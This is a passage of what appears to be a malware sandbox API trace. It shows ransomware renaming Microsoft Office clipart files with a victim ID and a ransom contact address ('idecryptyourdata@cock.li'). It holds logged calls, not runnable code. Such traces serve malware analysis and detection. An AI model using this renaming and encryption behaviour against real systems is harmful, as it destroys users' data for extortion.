returned 0xffffffff [0159.567] CloseHandle (hObject=0x490) returned 1 [0159.569] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.569] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.569] CloseHandle (hObject=0x490) returned 1 [0159.570] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.570] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.570] CloseHandle (hObject=0x490) returned 1 [0159.571] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.571] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.571] CloseHandle (hObject=0x490) returned 1 [0159.572] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.572] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.572] CloseHandle (hObject=0x490) returned 1 [0159.573] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.573] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.574] CloseHandle (hObject=0x490) returned 1 [0159.575] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.575] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.576] CloseHandle (hObject=0x490) returned 1 [0159.576] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.576] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.577] CloseHandle (hObject=0x490) returned 1 [0159.577] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.577] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.578] CloseHandle (hObject=0x490) returned 1 [0159.579] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.579] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.579] CloseHandle (hObject=0x490) returned 1 [0159.580] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.580] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.581] CloseHandle (hObject=0x490) returned 1 [0159.581] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.581] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.582] CloseHandle (hObject=0x490) returned 1 [0159.582] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.582] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.583] CloseHandle (hObject=0x490) returned 1 [0159.584] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.584] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.584] CloseHandle (hObject=0x490) returned 1 [0159.585] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.585] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105912.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105912.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.586] CloseHandle (hObject=0x490) returned 1 [0159.587] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.587] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105974.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105974.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.587] CloseHandle (hObject=0x490) returned 1 [0159.593] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.593] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106020.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106020.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.593] CloseHandle (hObject=0x490) returned 1 [0159.594] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.594] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106124.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106124.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.594] CloseHandle (hObject=0x490) returned 1 [0159.595] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.595] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.595] CloseHandle (hObject=0x490) returned 1 [0159.596] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.596] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.597] CloseHandle (hObject=0x490) returned 1 [0159.598] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.598] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.598] CloseHandle (hObject=0x490) returned 1 [0159.599] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.599] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.599] CloseHandle (hObject=0x490) returned 1 [0159.600] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.600] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.084] CloseHandle (hObject=0x490) returned 1 [0162.010] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.011] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107134.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.384] CloseHandle (hObject=0x514) returned 1 [0162.385] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.385] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107328.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.386] CloseHandle (hObject=0x514) returned 1 [0162.387] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.387] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.388] CloseHandle (hObject=0x514) returned 1 [0162.389] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.389] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107344.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107344.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.389] CloseHandle (hObject=0x514) returned 1 [0162.390] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.390] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107350.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107350.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.390] CloseHandle (hObject=0x514) returned 1 [0162.391] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.391] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107358.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107358.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.391] CloseHandle (hObject=0x514) returned 1 [0162.392] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.392] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107364.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.392] CloseHandle (hObject=0x514) returned 1 [0162.394] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.394] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107426.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.394] CloseHandle (hObject=0x514) returned 1 [0162.395] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.395] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107446.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.396] CloseHandle (hObject=0x514) returned 1 [0162.396] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.396] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0162.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107450.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.397] CloseHandle (hObject=0x514) returned 1 [0162.399] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: 